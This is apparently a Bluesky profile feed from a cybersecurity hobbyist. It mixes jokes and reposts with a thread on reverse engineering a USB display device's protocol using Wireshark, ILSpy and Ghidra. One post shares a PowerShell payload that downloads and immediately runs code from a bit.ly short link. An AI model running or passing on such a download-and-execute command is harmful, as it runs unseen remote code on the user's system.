⛵🔌

@shadylink.lol

48 followers 93 following 856 posts

she/her Beep boop I do computer 🏳️‍⚧️ Cyber security | Vidya james | Photography | hot takes


⛵🔌 @shadylink.lol

🫡 good work son

0 replies 0 reposts 1 likes


⛵🔌 @shadylink.lol

Here's a fun payload for you: iex (New-Object Net.WebClient).DownloadString("bit.ly/rRpwSh") *Please do not run this on a host you do not own!! (it's not malicious but still...)

1 replies 0 reposts 1 likes


⛵🔌 @shadylink.lol

I love regex. Keeping a book (.txt file) of little spells 😍

0 replies 0 reposts 0 likes


⛵🔌 @shadylink.lol

If their property value is so fragile it can be destroyed by an adjacent yard with tall grass then it must not have been a very good property.

0 replies 0 reposts 9 likes


Reposted by ⛵🔌

isobel @isobel.top

it only took like 40,000 trips to the roundtable hold, but i finally figured out a way to remember which door goes to the blacksmith without me somehow going the wrong way twice fuckin USB ass home base

3 replies 2 reposts 9 likes


⛵🔌 @shadylink.lol

Mmm chicken strips... 🤤

1 replies 0 reposts 1 likes


⛵🔌 @shadylink.lol

So I spent the next hour or so digging into various functions in the DLL and notating which headers are what and ended up with some nicely commented frames in Wireshark. Next step is to try and emulate some of these via Python in Linux...

0 replies 1 reposts 0 likes


⛵🔌 @shadylink.lol

After some digging in Ghidra I narrowed down a couple of consistent functions such as the fun_CRCMessage? that appears to validate/format the message that gets sent to the device. When I saw the CONCAT14(byBrightness,0x312) I got the idea that this might be visible in the pcap and wow! There it is!

1 replies 1 reposts 0 likes


⛵🔌 @shadylink.lol

Starting with ILSpy I can look at the external references to the DisplayPadSDK.dll and see how they're being called and what parameters are being passed. This is useful to me because it tells me how the DLL is being used and what kind of data the .dll is working with.

1 replies 1 reposts 0 likes


⛵🔌 @shadylink.lol

Okay, here's the scoop on the URB frames... Captured a bunch of stuff with Wireshark, in this instance the software is sending commands for a 'device reset'. Thankfully some components of the app are written in .NET so I can run em through ILSpy, this gives me a great starting point in Ghidra-

1 replies 0 reposts 0 likes


⛵🔌 @shadylink.lol

Why do they call it freezer when you of the live people in out of in the dead people

0 replies 0 reposts 1 likes


⛵🔌 @shadylink.lol

They have a buy one get one deal on Cyber War.

0 replies 0 reposts 0 likes


⛵🔌 @shadylink.lol

More on this, the device shows up as a W55FA93 Winbond Dev Tool Device. Not much documentation online to go off of unfortunately. There is a block device (/dev/sda) that appears so I imagine it might be some type of SPI flash or whatever. I'm not very smort because I can't get it to do anything!

0 replies 0 reposts 0 likes


⛵🔌 @shadylink.lol

Girl I think you got the wrong end.

0 replies 0 reposts 3 likes


⛵🔌 @shadylink.lol

I noticed there wasn't a reverse engineering feed so I took it upon myself to make one. Feel free to check it out or drop any suggestions!

bsky.app/profile/shad...